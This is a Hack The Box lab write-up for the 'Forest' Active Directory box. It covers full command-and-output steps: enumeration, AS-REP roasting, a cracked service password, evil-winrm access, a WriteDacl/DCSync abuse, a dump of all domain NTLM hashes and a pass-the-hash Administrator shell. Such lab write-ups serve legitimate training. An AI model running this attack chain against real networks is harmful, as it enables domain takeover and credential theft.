HTB Writeup: Forest
It is fool to expect animals in active directory forest. Or is it?
Enumeration
nmap scan
➜ mostwanted002@Loki Forest please nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
[sudo] password for mostwanted002:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 18:24 IST
Nmap scan report for 10.129.95.210 (10.129.95.210)
Host is up (0.074s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-23 13:01:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-06-23T13:02:50
|_ start_date: 2022-06-23T12:59:00
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-06-23T06:02:46-07:00
|_clock-skew: mean: 2h26m51s, deviation: 4h02m29s, median: 6m50s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.20 seconds
- It is found that Kerberos Domain Controller is available on the remote target, which implies:
- Host is a part of an Active Directory Domain (htb.local) (from nmap)
- Host is a domain controller. (Windows Server 2016) (from nmap)
RPC Enumeration
-
Enumerating AD properties using
rpcclient
provides following information:Domain Info
rpcclient $> querydominfo Domain: HTB Server: Comment: Total Users: 105 Total Groups: 0 Total Aliases: 0 Sequence No: 1 Force Logoff: -1 Domain Server State: 0x1 Server Role: ROLE_DOMAIN_PDC Unknown 3: 0x1 rpcclient $> lookupdomain htb.local SAMR_LOOKUP_DOMAIN: Domain Name: htb.local Domain SID: S-1-5-21-3072663084-364016917-1341370565
Domain Users
rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[$331000-VK4ADACQNUCA] rid:[0x463] user:[SM_2c8eef0a09b545acb] rid:[0x464] user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465] user:[SM_75a538d3025e4db9a] rid:[0x466] user:[SM_681f53d4942840e18] rid:[0x467] user:[SM_1b41c9286325456bb] rid:[0x468] user:[SM_9b69f1b9d2cc45549] rid:[0x469] user:[SM_7c96b981967141ebb] rid:[0x46a] user:[SM_c75ee099d0a64c91b] rid:[0x46b] user:[SM_1ffab36a2f5f479cb] rid:[0x46c] user:[HealthMailboxc3d7722] rid:[0x46e] user:[HealthMailboxfc9daad] rid:[0x46f] user:[HealthMailboxc0a90c9] rid:[0x470] user:[HealthMailbox670628e] rid:[0x471] user:[HealthMailbox968e74d] rid:[0x472] user:[HealthMailbox6ded678] rid:[0x473] user:[HealthMailbox83d6781] rid:[0x474] user:[HealthMailboxfd87238] rid:[0x475] user:[HealthMailboxb01ac64] rid:[0x476] user:[HealthMailbox7108a4e] rid:[0x477] user:[HealthMailbox0659cc1] rid:[0x478] user:[sebastien] rid:[0x479] user:[lucinda] rid:[0x47a] user:[svc-alfresco] rid:[0x47b] user:[andy] rid:[0x47e] user:[mark] rid:[0x47f] user:[santi] rid:[0x480]
Domain Groups
rpcclient $> enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] group:[Organization Management] rid:[0x450] group:[Recipient Management] rid:[0x451] group:[View-Only Organization Management] rid:[0x452] group:[Public Folder Management] rid:[0x453] group:[UM Management] rid:[0x454] group:[Help Desk] rid:[0x455] group:[Records Management] rid:[0x456] group:[Discovery Management] rid:[0x457] group:[Server Management] rid:[0x458] group:[Delegated Setup] rid:[0x459] group:[Hygiene Management] rid:[0x45a] group:[Compliance Management] rid:[0x45b] group:[Security Reader] rid:[0x45c] group:[Security Administrator] rid:[0x45d] group:[Exchange Servers] rid:[0x45e] group:[Exchange Trusted Subsystem] rid:[0x45f] group:[Managed Availability Servers] rid:[0x460] group:[Exchange Windows Permissions] rid:[0x461] group:[ExchangeLegacyInterop] rid:[0x462] group:[$D31000-NSEL5BRJ63V7] rid:[0x46d] group:[Service Accounts] rid:[0x47c] group:[Privileged IT Accounts] rid:[0x47d] group:[test] rid:[0x13ed]
Domain Password Policy
rpcclient $> getdompwinfo min_password_length: 7 password_properties: 0x00000000
-
A service account is found
svc-alfresco
. Enumerating further on this user, the user has default password policy (minimum 7 characters, no restrictions). Nothing interesting was found in user properties as well.rpcclient $> queryuser svc-alfresco User Name : svc-alfresco Full Name : svc-alfresco Home Drive : Dir Drive : Profile Path: Logon Script: Description : Workstations: Comment : Remote Dial : Logon Time : Mon, 23 Sep 2019 16:39:48 IST Logoff Time : Thu, 01 Jan 1970 05:30:00 IST Kickoff Time : Thu, 01 Jan 1970 05:30:00 IST Password last set Time : Thu, 23 Jun 2022 18:59:18 IST Password can change Time : Fri, 24 Jun 2022 18:59:18 IST Password must change Time: Thu, 14 Sep 30828 08:18:05 IST unknown_2[0..31]... user_rid : 0x47b group_rid: 0x201 acb_info : 0x00010210 fields_present: 0x00ffffff logon_divs: 168 bad_password_count: 0x00000000 logon_count: 0x00000006 padding1[0..7]... logon_hrs[0..21]...
-
Since this is a service account,
DONT_REQ_PREAUTH
can be checked on it to verify if this account is vulnerable to ASREPRoast or not.
Initial Foothold
-
Checking for Named Principal User using
impacket
scriptGetNPUsers.py
turns out to be successful, which implies the usersvc-alfresco
is ASREPRoastable. Getting the hash in hashcat format with following command and cracking it gives the password for the usersvc-alfresco
GetNPUsers.py -dc-ip 10.129.95.210 htb.local/svc-alfresco -no-pass -format hashcat -outputfile svc-alfresco.hash Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Getting TGT for svc-alfresco $krb5asrep$23$svc-alfresco@HTB.LOCAL:ee847ee87b8cce1fe6c245e4b1c2a06a$c6fb069422c97e501123a9226dc24cb839c3aa4d1a0e17bb0a588423e94a354c70afdf4499dbf3b20236bb75bcf745b7a77b9e56f602b19171712ce2eb0f00e177c98496d776a5fcd0d38b53f9da50d13721bfe7e8ff2ae9086409a785e357feb15f8af3a18afa60e0bec55f8ceffe81a8538fd1c23243131cc70c92e51e3508c5d96771eeb90926aa8a8e2e29caca998d9dcc34bc51173b3f38cf158c6d308387160816737c9ba327d12e60feb87a9de6098a863feec4be8b28fc9852efb32c9e1acbe51cffdc72c757d92c47d4d132cde6b24e873887f21ec944983b85289fcd7a06a23f67
The hashcat mode is 18200 for Kerberos 5, AS-REP. The password was successfully cracked using
rockyou.txt
wordlist. -
Valid credentials,
svc-alfresco:s3rvice
are obtained. -
Using
Evil-WinRM
, a valid remote powershell session is obtained.evil-winrm -u svc-alfresco -p s3rvice -i forest.htb.local # forest.htb.local => IP of the remote host.
Privilege Escalation
Active Directory Mapping and Enumeration
Bloodhound and Sharphound
- Since this is an Active Directory Scenario,
Bloodhound
can be used to draw the layout of AD structure and can help in further enumeration. - Invoking SharpHound with all collection methods and analysing the data in Bloodhound provides the following valuable information:
-
svc-alfresco@htb.local
is a member ofService Accounts
domain group. -
Service Accounts
domain group is a member ofPrivileged IT Accounts
domain group. -
Privileged IT Accounts
domain is a member ofAccount Operators
domain group. -
Accounts Operators
domain group hasGenricAll
DACL (Discretionary Access Control List) on most of the domain groups.GenericAll
DACL allows full control on the object. -
Out of all the domain groups, the one with interesting DACL is
Exchange Windows Permissions
domain group. It hasWriteDacl
on the entire domainHTB.LOCAL
. -
On reading the help text for
WriteDacl
in Bloodhound, it is found that a user can be added withDCSync
rights in the domain, which can then perform.
-
Exploitation
-
Since
svc-alfresco
transitively has rights onUsers
domain group andExchange Windows Permissions
group, a user can be created and added to the privileged group.+net.exe user john password123 /add /domain net.exe group 'exchange windows permissions' john /add
-
Since the next commands are needed to be run as
htb\john
andhtb\john
cannot PSRemote onto the domain controller,[DCSync.py](https://github.com/n00py/DCSync)
can be used to providehtb\john
with DCSync rights.python3 ./DCSync.py -dc forest.htb.local -t 'CN=john,CN=Users,DC=htb,DC=local' 'htb\john:password123' Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Starting DCSync Attack against CN=john,CN=Users,DC=htb,DC=local [*] Initializing LDAP connection to forest.htb.local [*] Using htb\john account with password *** [*] LDAP bind OK [*] Initializing domainDumper() [*] Initializing LDAPAttack() [*] Querying domain security descriptor [*] Success! User john now has Replication-Get-Changes-All privileges on the domain [*] Try using DCSync with secretsdump.py and this user :) [*] Saved restore state to aclpwn-20220626-001031.restore
-
Now, a DCSync can be performed with the user
htb\john
and NTLM hashes for all the users in the domain can now be obtained.secretsdump.py 'htb/john:password123@htb.local' -target-ip 10.129.224.200 -dc-ip 10.129.224.200 Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc::: htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3::: htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668::: htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b::: htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7::: htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072::: john:10101:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da::: FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:20a870de75e825622c71d13adcf223cb::: EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1::: ... ... ...
-
After the DCSync rights are obtained successfully, a remote session on the domain controller can now be obtained using
smbexec.py
fromImpacket
toolkit.smbexec.py -dc-ip 10.129.95.210 htb.local/Administrator@forest.htb.local -hashes "aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6"
The remote target active directory environment is now completely compromised. For persistence, a Golden-Ticket can be issued using krbtgt
hash dumped from DCSync.